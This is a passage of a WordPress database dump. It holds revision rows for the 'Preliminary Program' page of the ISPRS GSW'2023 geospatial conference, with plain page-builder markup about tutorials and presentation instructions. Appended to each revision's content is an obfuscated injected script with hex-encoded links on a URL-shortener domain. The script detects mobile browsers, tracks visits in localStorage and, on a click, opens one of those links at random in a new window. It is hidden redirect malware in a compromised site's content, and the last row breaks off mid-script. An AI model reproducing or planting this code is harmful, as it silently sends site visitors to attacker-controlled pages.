_0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','Program','','inherit','closed','closed','','2669-revision-v1','','','2023-06-23 20:24:21','2023-06-23 20:24:21','',2669,'https://gsw2023.com/?p=4744',0,'revision','',0),
(4745,1,'2023-06-23 20:27:02','2023-06-23 20:27:02','','Picture1','','inherit','open','closed','','picture1-2','','','2023-06-23 20:27:02','2023-06-23 20:27:02','',2669,'https://gsw2023.com/wp-content/uploads/2023/06/Picture1-1.png',0,'attachment','image/png',0),
(4746,1,'2023-06-23 20:27:54','2023-06-23 20:27:54','<p>[vc_row][vc_column][vc_single_image image=\"4745\" img_size=\"1900x800\" title=\"ISPRS GSW’2023 - Preliminary Program\"][/vc_column][/vc_row][vc_row][vc_column][vc_column_text]</p>\n<style>\n			.gap-10 {<br />				width:100%;<br />				height:20px;<br />			}<br />			.gap-50 {<br />				width:100%;<br />				height:50px;<br />			}<br />			.gap-100 {<br />				width:100%;<br />				height:130px;<br />			}<br />		</style>\n<div class=\"gap-10\"></div>\n<p style=\"color: gray;\"><span style=\"font-size: 14pt;\"><strong>Tutorials</strong></span></p>\n<ul class=\"nospace\">\n<li style=\"list-style-type: none;\">\n<ul class=\"nospace\">\n<li>The GSW2023 will offer at least 4 tutorials on September 2, 2023. The tutorials will cover the state of the art and future trends in the Geospatial technologies and applications. The tutorial program will be announced soon.</li>\n</ul>\n</li>\n</ul>\n<div class=\"gap-50\"></div>\n<p>&nbsp;</p>\n<p style=\"color: gray;\"><strong><span style=\"font-size: 14pt;\">Instruction for Oral Presentations</span></strong></p>\n<ul class=\"nospace\">\n<li style=\"list-style-type: none;\">\n<ul class=\"nospace\">\n<li>More instructions will be announced once the program in complete in May 2023.</li>\n</ul>\n</li>\n</ul>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][ultimate_info_table][/ultimate_info_table][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','Program','','inherit','closed','closed','','2669-revision-v1','','','2023-06-23 20:27:54','2023-06-23 20:27:54','',2669,'https://gsw2023.com/?p=4746',0,'revision','',0),
(4747,4,'2023-06-23 20:30:37','2023-06-23 20:30:37','[vc_row][vc_column][vc_single_image image=\"4745\" img_size=\"1900x800\" title=\"ISPRS GSW’2023 - Preliminary Program\"][/vc_column][/vc_row][vc_row][vc_column][vc_column_text]\r\n\r\n<style>\r\n			.gap-10 {<br />				width:100%;<br />				height:20px;<br />			}<br />			.gap-50 {<br />				width:100%;<br />				height:50px;<br />			}<br />			.gap-100 {<br />				width:100%;<br />				height:130px;<br />			}<br />		</style>\r\n<div class=\"gap-10\"></div>\r\n<p style=\"color: gray;\"><span style=\"font-size: 14pt;\"><strong>Tutorials</strong></span></p>\r\n\r\n<ul class=\"nospace\">\r\n 	<li style=\"list-style-type: none;\">\r\n<ul class=\"nospace\">\r\n 	<li>The GSW2023 will offer at least 4 tutorials on September 2, 2023. The tutorials will cover the state of the art and future trends in the Geospatial technologies and applications. The tutorial program will be announced soon.</li>\r\n</ul>\r\n</li>\r\n</ul>\r\n<div class=\"gap-50\"></div>\r\n&nbsp;\r\n<p style=\"color: gray;\"><strong><span style=\"font-size: 14pt;\">Instruction for Oral Presentations</span></strong></p>\r\n\r\n<ul class=\"nospace\">\r\n 	<li style=\"list-style-type: none;\">\r\n<ul class=\"nospace\">\r\n 	<li>More instructions will be announced once the program in complete in May 2023.</li>\r\n</ul>\r\n</li>\r\n</ul>\r\n[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][ultimate_info_table][/ultimate_info_table][/vc_column][/vc_row]\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','Preliminary Program','','inherit','closed','closed','','2669-revision-v1','','','2023-06-23 20:30:37','2023-06-23 20:30:37','',2669,'https://gsw2023.com/?p=4747',0,'revision','',0),
(4748,1,'2023-06-23 20:30:40','2023-06-23 20:30:40','<p>[vc_row][vc_column][vc_single_image image=\"4745\" img_size=\"1900x800\" title=\"ISPRS GSW’2023 - Preliminary Program\"][/vc_column][/vc_row][vc_row][vc_column][/vc_column][/vc_row][vc_row][vc_column][ultimate_info_table][/ultimate_info_table][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\